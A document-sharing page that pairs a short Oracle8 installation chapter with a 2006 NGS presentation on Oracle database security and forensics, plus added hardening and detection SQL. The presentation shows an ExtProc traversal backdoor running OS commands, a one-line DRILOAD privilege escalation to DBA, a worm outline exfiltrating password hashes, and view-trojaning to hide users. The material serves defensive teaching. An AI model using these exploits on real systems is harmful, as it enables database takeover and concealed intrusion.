Oracle Database Security Lecture Notes - by Paul Wright
- Format: pdf
- Size: 574.43 KB
- Pages: 29
Chapter 2: Oracle Basics
- Installing Oracle: Oracle product overview; installing the Oracle client; installing the Oracle server
- Basic content and concepts of the Oracle8 database: roles, users, client-to-server connections

Section 1: Installing Oracle
- Oracle product overview
- Installing the Oracle client
- Installing the Oracle server

2.1.1 Oracle product overview
Oracle consists of a server software package and a client software package.
Runtime environment (for Windows):
- Server side: NT 4.0 Workstation (Server), Windows 2000.
- Client side: in addition to the above, Windows 95 and Windows 98.

Structure of the Oracle server (see the figure below):
- SVRMGR: Server Manager
- Net8: Oracle's own network communication protocol
- SQL*PLUS
- EXP80 / IMP80: export and import utilities
- Loader: data loading utility
- Precompilers: precompilers
[Figure: structure of the Oracle8 server. Components shown: Loader, SVRMGR, SQL*PLUS, Net8 (to the client), Precompiler, EXP80, IMP80, Oracle8 server.]

Common Oracle client tools:
- Enterprise Manager: day-to-day administration of the Oracle database
- Net8 Easy Config: creates new services and the connections for the database engine and client utilities
- SQL*PLUS

2.1.2 Client installation
Insert the CD, run setup.exe and follow the on-screen prompts.

2.1.3 Server installation
Software requirements: Windows NT Workstation (Server) 4.0 or Windows 2000.
Hardware requirements: a Pentium or later processor, with multiprocessor support; at least 48 MB of memory; a networked working environment; at least 200 MB of hard disk space.
Installation process: run setup.exe and follow the on-screen prompts. When installation is complete, restart the computer.

Section 2: Basic content and concepts: roles and users
2.2.1 Roles
In Oracle, the relationship between roles, application roles, user roles and users is shown in the figure.
NGS Consulting, Next Generation Security Software Ltd.

Securing Oracle Forensically
Paul Wright, Security Software Developer and Consultant
Oracle Forensics at ISACA

About myself ~ Paul M. Wright
• University of Manchester Computer Scientist specialised in Oracle and security.
• 6 years Oracle experience and 7 years security experience.
• 11 SANS conferences and most GIAC qualified person in the UK.
• Pentest Ltd. Published the first paper on Oracle Forensics in January 2005.
• NGS Software for the last year writing security checks for Oracle Software, working with David Litchfield.
• First GSOC with the highest marks so far ~ Peter Finnigan's course.
• This latest work is an extension of the Oracle Forensics Paper for the GSOC qualification and I think it may be of interest to ISACA.

Plan of presentation
• General database security
• Oracle database security
• PLSQL packages and SQL Injection
• Identifying easy vulnerabilities
• Patching problems
• Trying to identify vulnerable procedures
• Identify vulnerable packages forensically
• Assessing risk to zero days retrospectively
• Questions

Some prior research about yourselves: financial sector, auditing and consultancy.

Why Database Security?
• Databases hold the most sensitive information in a company. Whether this is Financial, Medical or HR information, the database is the ultimate target of a hacker. Crown Jewels. Credit card numbers for instance.
• Privilege models in databases are less evolved, so difficult to manage, e.g. privilege inheritance with nested roles, and no explicit deny in Oracle, only revoke.
• Databases are used for increasingly complex tasks, as business logic moves from the middle tier to the database, and support for full programming languages such as Java and C is added. Therefore more vulnerabilities.
• Thin client desktop moves to the database. More access to the DB.

Introduction ~ NGS and Database Security
• NGS started in 2001, and much of the research was focused on database vulnerabilities, as this was expected to be a growth area within IT Security.
• In 2001, Oracle 9i was released, containing over 400 new features and the campaign slogan "Unbreakable". I was working as an Oracle developer at Linn Products at the time and had the word unbreakable on top of my monitor. David Litchfield broke it and now I work for him.
• In 2002, NGS developed vulnerability scanning tools for Oracle and MSSQL databases.
• Following further successes in database research and advisories released, NGS now has comprehensive scanning tools for DB2, Informix and Sybase.

Why Oracle Security now?
• Core database has been secure ~ Oracle's pride.
• The Alter session variable bug affected the whole DB and so dented this pride.
• Also Oracle criticised David Litchfield for presenting a fix in the absence of any other fix (mod_plsql gateway). Difficult to justify?
• Gartner: Oracle is no longer the bastion of security.
• I am interested in the technical rather than the political media side.

Locating, Analysing and Mitigating Threats ~ A generic process
• Locate the database instances on a network ~ port scanning, nmap.
• Run vulnerability audits similar to standard vulnerability assessment tools ~ a vulnerability scanner like Nessus.
• Run SQL scripts on the database to determine internal threats.
• Place vulnerabilities in a business context during report and analysis.
• Secure vulnerabilities through patching, revoking access, or removing the affected resource.

Top 8 threats that occur in a database?
1. Default or Weak Passwords
2. Privilege Abuse ~ no explicit deny priv, only revoke a grant.
3. Buffer Overflow and Format String
4. Network Communication vulns
5. Reading & Writing Arbitrary System Files
6. SQL Injection
7. Breaking out of the Database

SQL Injection in Oracle
• SQL Injection, alternatively known as insertion, means that the user can add their own SQL to the SQL that is being run. This is usually due to poor input validation.
For example in a PLSQL package:
• In Oracle, when a PL/SQL procedure executes, it does so with the permissions of the definer unless the AUTHID CURRENT_USER keyword has been specified, in which case it is executed as the invoker. Definer is similar to SUID in the UNIX OS.
• If PUBLIC has execute on the package, it is definer rights and it is owned by SYS, then SQL injected by PUBLIC will run with the privileges of SYS.
• There are many packages that fit this bill, which is one of the reasons why over 300 injection vulnerabilities have been found in Oracle recently (2004-2006). Imagine a unix OS where scripts are SUID by default! (maybe 300+ SQL Injection bugs is not so surprising…)

Breaking out of the Database ~ Oracle OS Compromise
• Oracle follows a very similar pattern, although this time the ExtProc service is used and the privileges required are CREATE LIBRARY. ExtProc is responsible for providing an interface between the database and any external stored procedures ~ in this case, our backdoor procedure.

CREATE OR REPLACE LIBRARY exec_shell AS
'$ORACLE_HOME\bin\..\..\..\..\..\..\..\C:\winnt\system32\msvcrt.dll';
/
CREATE OR REPLACE PACKAGE oracmd IS
  PROCEDURE exec (cmdstring IN CHAR);
END oracmd;
/
CREATE OR REPLACE PACKAGE BODY oracmd IS
  PROCEDURE exec (cmdstring IN CHAR)
  IS EXTERNAL
  NAME "system"
  LIBRARY exec_shell
  LANGUAGE C;
END oracmd;
/

Notice Oracle tries to stop us loading a library from anywhere outside its $ORACLE_HOME… and notice the ease with which we bypass it ~ a traversal attack!

Breaking Out of the Database
Oracle has a number of standard packages that could be used by an attacker to move from one database to another: UTL_TCP, UTL_HTTP and UTL_SMTP. UTL_TCP in particular would make this very easy to do.
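Returning to the definer-rights point of the SQL Injection slide above: the following is an added example written for this page, not code from the presentation or from NGS. The schema APP_OWNER, its EMP table, the role APP_READER and both procedure names are assumed. It places a procedure that splices its argument into dynamic SQL beside a form that binds the value, validates the one part that cannot be bound with DBMS_ASSERT (the subject of the DBMS_ASSERT paper in the references), and runs with invoker rights.

```sql
-- Added example, not from the original presentation. APP_OWNER, EMP,
-- APP_READER and the procedure names are assumed.

-- Vulnerable pattern: definer rights (Oracle's default) plus concatenation.
-- Whoever holds EXECUTE runs the dynamic statement as APP_OWNER, and a
-- single quote inside p_name terminates the literal, so the rest of the
-- argument is parsed as SQL with APP_OWNER's privileges (the SUID analogy
-- from the slide).
CREATE OR REPLACE PROCEDURE app_owner.count_emp_unsafe (p_name IN VARCHAR2)
AUTHID DEFINER
AS
  v_cnt NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app_owner.emp WHERE ename = ''' || p_name || ''''
    INTO v_cnt;
  DBMS_OUTPUT.PUT_LINE('matches: ' || v_cnt);
END;
/

-- Hardened form:
--  * AUTHID CURRENT_USER: the statement runs with the caller's own
--    privileges, so EXECUTE on the procedure no longer lends out the
--    owner's rights (callers need their own SELECT on the table);
--  * bind variable: p_name travels as data and is never part of the text;
--  * DBMS_ASSERT.SIMPLE_SQL_NAME (10gR2 and later): identifiers cannot be
--    bound, so the table name is validated before it is concatenated.
CREATE OR REPLACE PROCEDURE app_owner.count_emp_safe (
  p_name  IN VARCHAR2,
  p_table IN VARCHAR2 DEFAULT 'EMP')
AUTHID CURRENT_USER
AS
  v_cnt   NUMBER;
  v_table VARCHAR2(128);
BEGIN
  v_table := SYS.DBMS_ASSERT.SIMPLE_SQL_NAME(p_table);  -- raises ORA-44003 on a bad name
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM app_owner.' || v_table || ' WHERE ename = :1'
    INTO v_cnt
    USING p_name;
  DBMS_OUTPUT.PUT_LINE('matches: ' || v_cnt);
END;
/

-- Privilege hygiene: grant to a named role, never to PUBLIC.
GRANT EXECUTE ON app_owner.count_emp_safe TO app_reader;
```

The two changes address different halves of the slide's argument: the bind variable removes the injection, and AUTHID CURRENT_USER removes the privilege amplification, so even a future concatenation bug in the procedure would run only with the caller's rights rather than the owner's.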
The key action is:

UTL_TCP.OPEN_CONNECTION(HOST, TCP_PORT)

in package SYS.UTL_TCP.CONNECTION … which allows for arbitrary connections to hosts and ports.

Database Worms ~ The Voyager PoC Worm: analysis
• Locate a default username and password within the database.
• Use the CTXSYS.DRILOAD.VALIDATE_STMT exploit to escalate the user to DBA.
• Use UTL_SMTP to send the Oracle password hashes to larry@oracle.com.
• Use UTL_TCP to locate further vulnerable databases on the network.

Violating the Oracle privilege model ~ with one line of SQL!
1. The DRILOAD package on Oracle 8i/9i (all versions) contains the procedure VALIDATE_STMT, which is used to test the validity of an SQL statement provided.
2. In the process of validating it, the statement is… EXECUTED!
3. The package can be run by a low-privileged user.
4. So the following statement would promote all users to database administrators:

exec CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO PUBLIC');

Code Injection within Database Resources
The package was updated in Alert 68, but how do we know whether we are vulnerable? Easy!

SELECT OWNER, PACKAGE_NAME FROM ALL_ARGUMENTS
WHERE OWNER='CTXSYS' AND PACKAGE_NAME='DRILOAD' AND OBJECT_NAME='VALIDATE_STMT';

no rows selected

The vulnerable procedure has been dropped by a patch. If it is there you are vulnerable. EASY.. but what if the vulnerable procedure is simply modified by a patch? How do you detect the vulnerable version of the procedure? Patch level should tell us.

Patch Activity ~ OPatch
• Oracle's patching system has had problems.
• DBAs historically encouraged to use pen and paper.
• I found a vulnerability in OPatch where it incorrectly identified the location of the inventory file. OPatch relies on file permissions to secure the file, which cannot be done if the location is not known.
• Inventory system has been unreliable, especially on rollback.
• Inventory can be bypassed anyway.
• Being able to read patches shows diligence of the DBA but not actual vulnerability. Need to identify the contents of the package.
Our software uses a low level technique to ascertain patch level by reading from the OS, but problem: OS access??

But what if we are dealing with an updated package ~ what then?
• Could identify a vulnerable version of this package using a tool like Repscan.
• Takes an MD5sum of the state of the package at that time and records it for future comparison.

Not forensically sound
• Could calculate MD5 directly using Oracle's built-in function dbms_obfuscation_toolkit.md5.
• Repscan is better in that it implements its own MD5 rather than relying on Oracle's, but it is not forensically sound.
• Could replace the MD5 hash with a collision using a tool like Stripwire by Dan Kaminsky, 2004.
• Repscan does not use file sizes to verify the file integrity, which would alleviate the above threat.
• Also does not use timestamps at all. Forensics correlates all information sources to deduce a more accurate conclusion.
From Latin forensis ~ of the forum ~ open debate, which linked to the court of law. Forensics techniques are being used in related areas such as corporate governance and risk.

Checksum and file size is more accurate

SELECT OWNER, NAME FROM DBA_SOURCE
WHERE OWNER='WKSYS' AND NAME='WK_ACL' AND TEXT LIKE '%a6764557%';

(David Litchfield, 2005)
In the original slide the literal is colour coded: blue is the checksum and green is the file size. If this query returns a row you are vulnerable on 10g. If not, then you are not vulnerable.

Database Vulnerability Scanners ~ NGSSquirrel for Oracle
[screenshot in the original slide]

Punchline
Problem is that it does not tell how long we have not been vulnerable for. Maybe the DBA has just patched.

Correlating timestamp, file size and checksum
• Time is forensically useful information.

SQL> exec sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa','a''a');
BEGIN sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa','a''a'); END;
*
ERROR at line 1:
ORA-01756: quoted string not properly terminated
ORA-06512: at "SYS.DBMS_AQ_INV", line 566
ORA-06512: at line 1

SQL> SELECT OWNER, NAME FROM DBA_SOURCE
     WHERE OWNER='SYS' AND NAME='DBMS_AQ_INV' AND TEXT LIKE '%786e 1907%';

OWNER   NAME
------  -----------
SYS     DBMS_AQ_INV

Forensic check

select last_ddl_time from dba_objects where object_name in
  (SELECT NAME FROM DBA_SOURCE
   WHERE OWNER='SYS' AND NAME='DBMS_AQ_INV' AND TEXT LIKE '%786e 1907%');

LAST_DDL_TIME
-------------
30-AUG-05
30-AUG-05
30-AUG-05

• What use is this?
• Can be used to retrospectively calculate the time that the package has been vulnerable, which can be used as a metric of risk.
• Also this information can be used to infer patch activity when many of these queries are put together.
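The three checks above (the checksum and size literal in DBA_SOURCE, the DDL timestamp in DBA_OBJECTS, and the risk metric (2×A + B) × C that the Retrospective zero-days slide defines next) can be run as one correlated query. This is an added example, not a query from the presentation or from NGS: the fingerprint literal is the DBMS_AQ_INV one from the slides, the two release dates are constructed placeholders, and the severity value is assumed. It goes a little beyond the slides in that it treats a package whose source still carries the fingerprint as vulnerable up to today rather than up to its LAST_DDL_TIME.

```sql
-- Added example, not from the original presentation. PLACEHOLDERS: the two
-- dates are constructed, not real release dates; the fingerprint is the one
-- the slides use for DBMS_AQ_INV and must be replaced for another package.
WITH params AS (
  SELECT 'SYS'              AS obj_owner,
         'DBMS_AQ_INV'      AS obj_name,
         '%786e 1907%'      AS fingerprint,        -- checksum + size of the vulnerable version
         DATE '2005-01-01'  AS exploit_released,   -- placeholder: exploit code public
         DATE '2005-04-12'  AS patch_released,     -- placeholder: vendor patch available
         3                  AS severity            -- C in the slide's formula (assumed scale)
  FROM dual
),
source_state AS (
  -- Step 1: fingerprint, line count and byte size of the stored source,
  -- one row per object type (PACKAGE, PACKAGE BODY). The fingerprint lives
  -- in the wrapped body, so the spec row is expected to report 0.
  SELECT s.owner, s.name, s.type,
         COUNT(*)            AS source_lines,
         SUM(LENGTH(s.text)) AS source_bytes,
         MAX(CASE WHEN s.text LIKE p.fingerprint THEN 1 ELSE 0 END) AS still_vulnerable
  FROM dba_source s
  JOIN params p ON p.obj_owner = s.owner AND p.obj_name = s.name
  GROUP BY s.owner, s.name, s.type
),
windows AS (
  -- Step 2: correlate with LAST_DDL_TIME. Caveat: LAST_DDL_TIME also moves on
  -- recompilation and on GRANT/REVOKE against the object, so on its own it
  -- does not prove a patch; it is read together with the fingerprint.
  SELECT st.*, o.last_ddl_time,
         p.patch_released - p.exploit_released AS a_days,
         CASE
           WHEN st.still_vulnerable = 1 THEN TRUNC(SYSDATE) - p.patch_released
           ELSE GREATEST(TRUNC(o.last_ddl_time) - p.patch_released, 0)
         END AS b_days,
         p.severity
  FROM source_state st
  JOIN dba_objects o
    ON o.owner = st.owner AND o.object_name = st.name AND o.object_type = st.type
  CROSS JOIN params p
)
-- Step 3: the slide's retrospective risk metric, (2 x A + B) x C.
SELECT owner, name, type, source_lines, source_bytes, still_vulnerable,
       last_ddl_time, a_days, b_days,
       (2 * a_days + b_days) * severity AS risk_score
FROM windows
ORDER BY type;
```

Recording source_lines and source_bytes alongside the fingerprint is the file-size correlation the "Not forensically sound" slide asks for: a substituted body that preserves a hash collision still has to match the stored line count and byte total, and the timestamp column is what turns a yes/no vulnerability answer into a window of exposure.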
Retrospective zero-days
• Using this technique we can calculate a past period of time that the DB has been vulnerable for.
• Time from exploit code being released till patch = A
• Time from patch release till last_ddl_time = B
• Severity of the vulnerability = C
• Risk calculation including severity could be something like..
• (2×A + B) × C = RISK

Knowing what you are vulnerable to and knowing what you have been vulnerable to
• Knowing what you have been vulnerable to is a measure of the risk you have been under.
• You may have had an incident and not known it.
• Reverse engineering patches helps security people know what has been fixed internal to the vendor.
• Most vulns are now not disclosed vulnerabilities.
• To know the risk you have been put under you need to realise this.

Oracle Antiforensics ~ what if a rootkit has been used?
• Most Enterprise administration tools use database views to display users, audit logs etc. because they are more convenient and the information is better ordered than in the underlying tables.
• But views are not tables! They are actually SQL which selects the appropriate information from tables…
• So what happens if you include trojan code in that SQL? You could append where user != 'hacker_user' to the SQL in the view wherever it selects users from the user table. Then the rogue user disappears from the Enterprise Manager.
CURE → use base tables instead of views.

Check the DB forensically through the OS layer
• Use known good hashes of Oracle OS files to ascertain forensically sound information about the state of the packages.
• This will give the hash of the .plb file, but remember this is not what is actually in the DB memory, as that is found from dba_source.
• There is also the opportunity to recover files in the OS that are from the Oracle datafiles, which will recover deleted data from Oracle.
• Forensics involves correlation of all the data: include checksum, timestamp and file size.

• New book on Oracle Forensics by the presenter, Paul M. Wright, on its way.
• /menu_oracle.htm
• Will contain more detail on Oracle Forensics concepts, expanding on the first Oracle Forensics paper: http://www.giac.org/certified_professionals/practicals/gcfa/0159.php
• Questions please.

NGS Consulting, Next Generation Security Software Ltd.
References:
/papers/DBMS_ASSERT.pdf
/papers/HackproofingMySQL.pdf
/papers/violating_database_security.pdf
/papers/advanced_sql_injection.pdf
/papers/more_advanced_sql_injection.pdf
/papers/sqlinference.pdf
/papers/hpoas.pdf
For more information visit our website at
Copyright © 2006. Next Generation Security Software Ltd.
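The "use base tables instead of views" cure from the Oracle Antiforensics slide can be turned into a routine check. The following is an added example, not from the presentation or from NGS, to be run as SYSDBA: it compares the DBA_USERS view with its base table SYS.USER$, names any account the view no longer returns, and lists dictionary views whose DDL time has moved since the catalog was created. The list of view names to watch is an assumption chosen for illustration.

```sql
-- Added example, not from the original presentation. Run as SYSDBA.

-- 1. Cross-check the view against its base table. DBA_USERS is built over
--    SYS.USER$ with TYPE# = 1 (users; 0 is roles); confirm the exact
--    definition for your release in DBA_VIEWS before relying on the counts.
--    A trojaned view that filters out an account shows up as a difference.
SELECT (SELECT COUNT(*) FROM sys.user$ WHERE type# = 1) AS users_in_base_table,
       (SELECT COUNT(*) FROM dba_users)                 AS users_in_view,
       (SELECT COUNT(*) FROM sys.user$ WHERE type# = 1)
         - (SELECT COUNT(*) FROM dba_users)             AS hidden_by_view
FROM dual;

-- 2. Name the accounts present in the base table but absent from the view.
SELECT u.name, u.ctime AS created
FROM sys.user$ u
WHERE u.type# = 1
  AND NOT EXISTS (SELECT 1 FROM dba_users d WHERE d.username = u.name)
ORDER BY u.ctime;

-- 3. Dictionary views altered after the catalog was created. Caveat:
--    upgrades and catalog patches also re-create these views, so this is a
--    lead to correlate with patch records and with the checksum/timestamp
--    checks on packages, not proof of tampering. The view list is assumed.
SELECT owner, object_name, created, last_ddl_time
FROM dba_objects
WHERE owner = 'SYS'
  AND object_type = 'VIEW'
  AND object_name IN ('DBA_USERS', 'ALL_USERS', 'DBA_ROLE_PRIVS',
                      'DBA_SYS_PRIVS', 'DBA_TAB_PRIVS', 'DBA_AUDIT_TRAIL')
  AND last_ddl_time > created
ORDER BY last_ddl_time DESC;
```

Query 2 is the operational one: a non-empty result is the rogue account the slide describes, found by the one source the view cannot hide, while query 3 is the timestamp correlation applied to the views themselves.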